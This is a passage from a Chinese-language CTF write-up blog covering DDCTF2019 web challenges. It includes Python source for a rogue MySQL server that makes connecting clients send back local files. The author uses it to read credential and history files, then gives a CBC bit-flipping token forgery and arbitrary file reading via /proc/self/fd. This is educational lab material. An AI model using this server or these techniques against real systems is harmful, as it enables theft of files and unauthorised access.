&quot;&#123;0&#125;&#123;1&#125;&quot;.format(</span><br><span class="line">            header,</span><br><span class="line">            self.payload</span><br><span class="line">        )</span><br><span class="line">        return result</span><br><span class="line"></span><br><span class="line">    def __repr__(self):</span><br><span class="line">        return repr(str(self))</span><br><span class="line"></span><br><span class="line">    @staticmethod</span><br><span class="line">    def parse(raw_data):</span><br><span class="line">        packet_num = ord(raw_data[0])</span><br><span class="line">        payload = raw_data[1:]</span><br><span class="line"></span><br><span class="line">        return mysql_packet(packet_num, payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class http_request_handler(asynchat.async_chat):</span><br><span class="line"></span><br><span class="line">    def __init__(self, addr):</span><br><span class="line">        asynchat.async_chat.__init__(self, sock=addr[0])</span><br><span class="line">        self.addr = addr[1]</span><br><span class="line">        self.ibuffer = []</span><br><span class="line">        self.set_terminator(3)</span><br><span class="line">        self.state = &apos;LEN&apos;</span><br><span class="line">        self.sub_state = &apos;Auth&apos;</span><br><span class="line">        self.logined = False</span><br><span class="line">        self.push(</span><br><span class="line">            mysql_packet(</span><br><span class="line">                0,</span><br><span class="line">                &quot;&quot;.join((</span><br><span class="line">                    &apos;\x0a&apos;,  # Protocol</span><br><span class="line">                    &apos;5.6.28-0ubuntu0.14.04.1&apos; + &apos;\0&apos;,</span><br><span class="line">                    &apos;\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00&apos;,</span><br><span class="line">                ))            )</span><br><span class="line">        )</span><br><span class="line"></span><br><span class="line">        self.order = 1</span><br><span class="line">        self.states = [&apos;LOGIN&apos;, &apos;CAPS&apos;, &apos;ANY&apos;]</span><br><span class="line"></span><br><span class="line">    def push(self, data):</span><br><span class="line">        log.debug(&apos;Pushed: %r&apos;, data)</span><br><span class="line">        data = str(data)</span><br><span class="line">        asynchat.async_chat.push(self, data)</span><br><span class="line"></span><br><span class="line">    def collect_incoming_data(self, data):</span><br><span class="line">        log.debug(&apos;Data recved: %r&apos;, data)</span><br><span class="line">        self.ibuffer.append(data)</span><br><span class="line"></span><br><span class="line">    def found_terminator(self):</span><br><span class="line">        data = &quot;&quot;.join(self.ibuffer)</span><br><span class="line">        self.ibuffer = []</span><br><span class="line"></span><br><span class="line">        if self.state == &apos;LEN&apos;:</span><br><span class="line">            len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1</span><br><span class="line">            if len_bytes &lt; 65536:</span><br><span class="line">                self.set_terminator(len_bytes)</span><br><span class="line">                self.state = &apos;Data&apos;</span><br><span class="line">            else:</span><br><span class="line">                self.state = &apos;MoreLength&apos;</span><br><span class="line">        elif self.state == &apos;MoreLength&apos;:</span><br><span class="line">            if data[0] != &apos;\0&apos;:</span><br><span class="line">                self.push(None)</span><br><span class="line">                self.close_when_done()</span><br><span class="line">            else:</span><br><span class="line">                self.state = &apos;Data&apos;</span><br><span class="line">        elif self.state == &apos;Data&apos;:</span><br><span class="line">            packet = mysql_packet.parse(data)</span><br><span class="line">            try:</span><br><span class="line">                if self.order != packet.packet_num:</span><br><span class="line">                    raise OutOfOrder()</span><br><span class="line">                else:</span><br><span class="line">                    # Fix ?</span><br><span class="line">                    self.order = packet.packet_num + 2</span><br><span class="line">                if packet.packet_num == 0:</span><br><span class="line">                    if packet.payload[0] == &apos;\x03&apos;:</span><br><span class="line">                        log.info(&apos;Query&apos;)</span><br><span class="line"></span><br><span class="line">                        filename = random.choice(filelist)</span><br><span class="line">                        PACKET = mysql_packet(</span><br><span class="line">                            packet,</span><br><span class="line">                            &apos;\xFB&#123;0&#125;&apos;.format(filename)</span><br><span class="line">                        )</span><br><span class="line">                        self.set_terminator(3)</span><br><span class="line">                        self.state = &apos;LEN&apos;</span><br><span class="line">                        self.sub_state = &apos;File&apos;</span><br><span class="line">                        self.push(PACKET)</span><br><span class="line">                    elif packet.payload[0] == &apos;\x1b&apos;:</span><br><span class="line">                        log.info(&apos;SelectDB&apos;)</span><br><span class="line">                        self.push(mysql_packet(</span><br><span class="line">                            packet,</span><br><span class="line">                            &apos;\xfe\x00\x00\x02\x00&apos;</span><br><span class="line">                        ))</span><br><span class="line">                        raise LastPacket()</span><br><span class="line">                    elif packet.payload[0] in &apos;\x02&apos;:</span><br><span class="line">                        self.push(mysql_packet(</span><br><span class="line">                            packet, &apos;\0\0\0\x02\0\0\0&apos;</span><br><span class="line">                        ))</span><br><span class="line">                        raise LastPacket()</span><br><span class="line">                    elif packet.payload == &apos;\x00\x01&apos;:</span><br><span class="line">                        self.push(None)</span><br><span class="line">                        self.close_when_done()</span><br><span class="line">                    else:</span><br><span class="line">                        raise ValueError()</span><br><span class="line">                else:</span><br><span class="line">                    if self.sub_state == &apos;File&apos;:</span><br><span class="line">                        log.info(&apos;-- result&apos;)</span><br><span class="line">                        log.info(&apos;Result: %r&apos;, data)</span><br><span class="line"></span><br><span class="line">                        if len(data) == 1:</span><br><span class="line">                            self.push(</span><br><span class="line">                                mysql_packet(packet, &apos;\0\0\0\x02\0\0\0&apos;)</span><br><span class="line">                            )</span><br><span class="line">                            raise LastPacket()</span><br><span class="line">                        else:</span><br><span class="line">                            self.set_terminator(3)</span><br><span class="line">                            self.state = &apos;LEN&apos;</span><br><span class="line">                            self.order = packet.packet_num + 1</span><br><span class="line"></span><br><span class="line">                    elif self.sub_state == &apos;Auth&apos;:</span><br><span class="line">                        self.push(mysql_packet(</span><br><span class="line">                            packet, &apos;\0\0\0\x02\0\0\0&apos;</span><br><span class="line">                        ))</span><br><span class="line">                        raise LastPacket()</span><br><span class="line">                    else:</span><br><span class="line">                        log.info(&apos;-- else&apos;)</span><br><span class="line">                        raise ValueError(&apos;Unknown packet&apos;)</span><br><span class="line">            except LastPacket:</span><br><span class="line">                log.info(&apos;Last packet&apos;)</span><br><span class="line">                self.state = &apos;LEN&apos;</span><br><span class="line">                self.sub_state = None</span><br><span class="line">                self.order = 0</span><br><span class="line">                self.set_terminator(3)</span><br><span class="line">            except OutOfOrder:</span><br><span class="line">                log.warning(&apos;Out of order&apos;)</span><br><span class="line">                self.push(None)</span><br><span class="line">                self.close_when_done()</span><br><span class="line">        else:</span><br><span class="line">            log.error(&apos;Unknown state&apos;)</span><br><span class="line">            self.push(&apos;None&apos;)</span><br><span class="line">            self.close_when_done()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class mysql_listener(asyncore.dispatcher):</span><br><span class="line">    def __init__(self, sock=None):</span><br><span class="line">        asyncore.dispatcher.__init__(self, sock)</span><br><span class="line"></span><br><span class="line">        if not sock:</span><br><span class="line">            self.create_socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">            self.set_reuse_addr()</span><br><span class="line">            try:</span><br><span class="line">                self.bind((&apos;&apos;, PORT))</span><br><span class="line">            except socket.error:</span><br><span class="line">                exit()</span><br><span class="line"></span><br><span class="line">            self.listen(5)</span><br><span class="line"></span><br><span class="line">    def handle_accept(self):</span><br><span class="line">        pair = self.accept()</span><br><span class="line"></span><br><span class="line">        if pair is not None:</span><br><span class="line">            log.info(&apos;Conn from: %r&apos;, pair[1])</span><br><span class="line">            tmp = http_request_handler(pair)</span><br><span class="line"></span><br><span class="line">z = mysql_listener()</span><br><span class="line"># daemonize()</span><br><span class="line">asyncore.loop()</span><br></pre></td></tr></table></figure>
<p>不过有点奇怪的是如果我停止3306端口上运行的<br>mysql，运行这个脚本，就会提示mysql未开启，需要修改一下agent.py才行。而换一个端口去运行就没这个问题【之后再研究看看<br>先获取/etc/passwd，读INFO：Result那个部分就好</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/b8d7387d827e3218921cb665c8580ef8.png" alt=""></p>
<p>然而没什么有用的，于是读/root/.bash_history</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/700ba752b3565079792da6841be6ab1c.png" alt=""></p>
<p>用脚本处理一下换行，会找到这样一段命令记录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">cd /home/dc2-user/ctf_web_2/</span><br><span class="line">ls</span><br><span class="line">cd app/</span><br><span class="line">ls</span><br><span class="line">cd main/</span><br><span class="line">ls</span><br><span class="line">vim views.py</span><br></pre></td></tr></table></figure>
<p>那就读一下<code>/home/dc2-user/ctf_web_2/app/views.py</code></p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/a2b1b5f99b46825134738b843f05f2ed.png" alt=""></p>
<p>同样也是处理一下，然后可以看到有一段注释<br><code># flag in mysql  curl@localhost database:security  table:flag\r</code><br>那就去读一下flag表 <code>/var/lib/mysql/security/flag.idb</code><br>但不知道为什么（可能是被删掉了），一直错误。于是尝试去读MySQL的操作记录，<code>/root/.mysql_history</code></p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/a595adf80ad5fc2a61091f4f47f837f0.png" alt=""></p>
<p>得到flag</p>
<h2 id="再来1杯Java"><a href="#再来1杯Java" class="headerlink" title="再来1杯Java"></a>再来1杯Java</h2><p>看名字就知道是JAVA web的题<br>先根据提示修改一下host进入网站，提示要成为admin用户。看页面没到找什么能搞的地方，于是bp抓个包</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/cd3f2311de46eba5cc3a507800eae18b.png" alt=""></p>
<p>看history可以看到，有两个接口，于是访问一下看看<br>发现account_info是获得用户身份，gen_token则是获得token。然后看token感觉像base64加密后的值，于是尝试解码一下</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/194c7e256fb39f568c44919c27d872f8.png" alt=""></p>
<p>可以看到，这里提示了CBC加密，然后看返回的token长为48位，而account_info返回的json字符串长在32位以内，于是猜测前面位iv后面位密文</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/af4f441326185df6dfd80dc1b84e9675.png" alt=""></p>
<p>那接下来的目标就是要把<code>roleAdmin</code>的值改为1（不太清楚为什么可以，明明java是强类型）。既然是CBC加密，那就上CBC翻转。<br>由于我们获得不到修改过一次后的iv值，于是不能直接把false改成true。这里我们要通过修改iv去控制第一段，同时将第二段置为脏字符，然后再修改第二段控制第三段<br><code>{&quot;roleAdmin&quot;:1,&quot;xxxxxxxxxxxxxxxx&quot;:&quot;1&quot;,&quot;id&quot;:001}</code><br>大概就是要弄成这样<br>这里控制iv改第一段很简单，<code>iv^明文^目标</code>就ok。但第三段不好控制，因为第三段不存在，我们要拿前两段其中一段作为第三段，然后再对第二段进行一下处理<br>我们知道CBC加密解密时是在key解密后和加密段异或，那么如果要更改加密段，就要先明文^加密段获得key解密后的密文，再key解密后的密文^新加密段获得新明文。然后就是正常程序，用新明文^新加密段^目标就能控制添加的段<br>于是用<code>第一段明文^iv^第二段^第二段^目标</code>得到第二段，然后把第一段接上即可。于是上脚本解决<br>搞定后提交访问，会多出一个下载的按钮</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/23446d98c49242e5df38e3f8fbee4f1e.png" alt=""></p>
<p>下载可以获得hint。<br>提示了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1. Env: Springboot + JDK8(openjdk version &quot;1.8.0_181&quot;) + Docker~ </span><br><span class="line">2. You can not exec commands~</span><br></pre></td></tr></table></figure>
<p>用了spring框架同时不能执行命令<br>这里当然也抓包试一下，发现了一个可能是任意读取文件的接口</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/c158521a6056bb5053390ea1e092861f.png" alt=""></p>
<p>然后一波操作下去发现只能得到/etc/passwd，而且也没什么用，于是试着跑一下进程目录/proc/self/fd/</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/89873709648b76ed126b513d1c53a0cf.png" alt=""></p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/0552f084a7be2a5b83c370eff07a8ce7.png" alt=""></p>
<p>【少用intruder于是记录一下省得又忘了</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/ad798ce63328aa1b8e21bfe39ceefc58.png" alt=""></p>
<p>可以明显看到15是有什么东西，读一下发现开头是pk</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/234e39680da8fbac538692fee518e463.png" alt=""></p>
<p>于是用python访问读取并二进制保存为zip，解压出来为一份源码</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"># web</a>
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/19/HITCON2017-web-wp/" rel="next" title="HITCON2017 web wp">
                <i class="fa fa-chevron-left"></i> HITCON2017 web wp
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/01/hackme-web-wp/" rel="prev" title="hackme web wp">
                hackme web wp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="http://shifeng-kaze.cn/blog/head/kotori.jpg" alt="k0t0r1">
            
              <p class="site-author-name" itemprop="name">k0t0r1</p>
              <p class="site-description motion-element" itemprop="description">～いらっしゃいません～</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://shifeng-kaze.cn/" title="shifeng-kaze" target="_blank">shifeng-kaze</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aluvion.github.io" title="Aluvion" target="_blank">Aluvion</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#滴"><span class="nav-number">1.</span> <span class="nav-text">滴~</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#WEB-签到题"><span class="nav-number">2.</span> <span class="nav-text">WEB 签到题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Upload-IMG"><span class="nav-number">3.</span> <span class="nav-text">Upload-IMG</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#homebrew-event-loop"><span class="nav-number">4.</span> <span class="nav-text">homebrew event loop</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#欢迎报名DDCTF"><span class="nav-number">5.</span> <span class="nav-text">欢迎报名DDCTF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#大吉大利-今晚吃鸡"><span class="nav-number">6.</span> <span class="nav-text">大吉大利,今晚吃鸡~</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mysql弱口令"><span class="nav-number">7.</span> <span class="nav-text">mysql弱口令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#再来1杯Java"><span class="nav-number">8.</span> <span class="nav-text">再来1杯Java</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">k0t0r1</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  

</body>
</html>
